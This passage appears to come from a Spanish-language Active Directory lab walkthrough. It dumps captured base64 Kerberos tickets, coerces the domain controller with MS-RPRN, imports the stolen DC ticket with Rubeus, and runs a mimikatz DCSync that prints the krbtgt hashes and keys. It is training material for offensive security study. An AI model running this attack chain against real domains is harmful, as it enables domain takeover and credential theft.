    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

[*] Ticket cache size: 17


[*] 3/2/2024 11:59:13 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:59:11 PM
  EndTime               :  3/2/2024 8:45:28 PM
  RenewTill             :  3/9/2024 10:45:28 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:59:13 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:22:36 PM
  EndTime               :  3/3/2024 1:22:36 AM
  RenewTill             :  3/9/2024 5:51:58 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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

[*] Ticket cache size: 19


[*] 3/2/2024 11:59:18 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:59:13 PM
  EndTime               :  3/3/2024 1:59:12 AM
  RenewTill             :  3/9/2024 3:59:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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

[*] Ticket cache size: 20


[*] 3/3/2024 12:00:13 AM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 4:00:12 PM
  EndTime               :  3/3/2024 2:00:12 AM
  RenewTill             :  3/9/2024 4:00:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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

Y en una terminal normal de nuestor usuario estudiante lanzamos el ataque en MS-RPRN.

PS C:\ad\Tools> .\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC server is unavailable.

Luego de obtener el ticket lo decodificamos en b64 e importamos.

PS C:\AD\Tools\tickets> $base64Content = Get-Content -Path "dc-pc.b64.txt"
PS C:\AD\Tools\tickets> [System.Convert]::FromBase64String($base64Content) | Set-Content -Path "dc-pc.kirbi" -Encoding Byte
PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0x17ce62

Cached Tickets: (0)

PS C:\AD\Tools\tickets> ..\Rubeus.exe ptt /ticket:dc-pc.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1


[*] Action: Import Ticket
[+] Ticket successfully imported!
PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0x17ce62

Cached Tickets: (1)

#0>     Client: DCORP-DC$ @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 3/2/2024 15:22:36 (local)
        End Time:   3/3/2024 1:22:36 (local)
        Renew Time: 3/9/2024 5:51:58 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Ahora, podemos cargar el comando de dcsync.

PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::dcsync /user:dcorp\krbtgt
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID   : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
    ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
    lm  - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
      aes128_hmac       (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
      des_cbc_md5       (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 150ea2e934ab6b80

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  a0e60e247b498de4cacfac3ba615af01
    02  86615bb9bf7e3c731ba1cb47aa89cf6d
    03  637dfb61467fdb4f176fe844fd260bac
    04  a0e60e247b498de4cacfac3ba615af01
    05  86615bb9bf7e3c731ba1cb47aa89cf6d
    06  d2874f937df1fd2b05f528c6e715ac7a
    07  a0e60e247b498de4cacfac3ba615af01
    08  e8ddc0d55ac23e847837791743b89d22
    09  e8ddc0d55ac23e847837791743b89d22
    10  5c324b8ab38cfca7542d5befb9849fd9
    11  f84dfb60f743b1368ea571504e34863a
    12  e8ddc0d55ac23e847837791743b89d22
    13  2281b35faded13ae4d78e33a1ef26933
    14  f84dfb60f743b1368ea571504e34863a
    15  d9ef5ed74ef473e89a570a10a706813e
    16  d9ef5ed74ef473e89a570a10a706813e
    17  87c75daa20ad259a6f783d61602086aa
    18  f0016c07fcff7d479633e8998c75bcf7
    19  7c4e5eb0d5d517f945cf22d74fec380e
    20  cb97816ac064a567fe37e8e8c863f2a7
    21  5adaa49a00f2803658c71f617031b385
    22  5adaa49a00f2803658c71f617031b385
    23  6d86f0be7751c8607e4b47912115bef2
    24  caa61bbf6b9c871af646935febf86b95
    25  caa61bbf6b9c871af646935febf86b95
    26  5d8e8f8f63b3bb6dd48db5d0352c194c
    27  3e139d350a9063db51226cfab9e42aa1
    28  d745c0538c8fd103d71229b017a987ce
    29  40b43724fa76e22b0d610d656fb49ddd

PreviousLearning Objective - 14 NextLearning Objective - 16

Last updated 1 year ago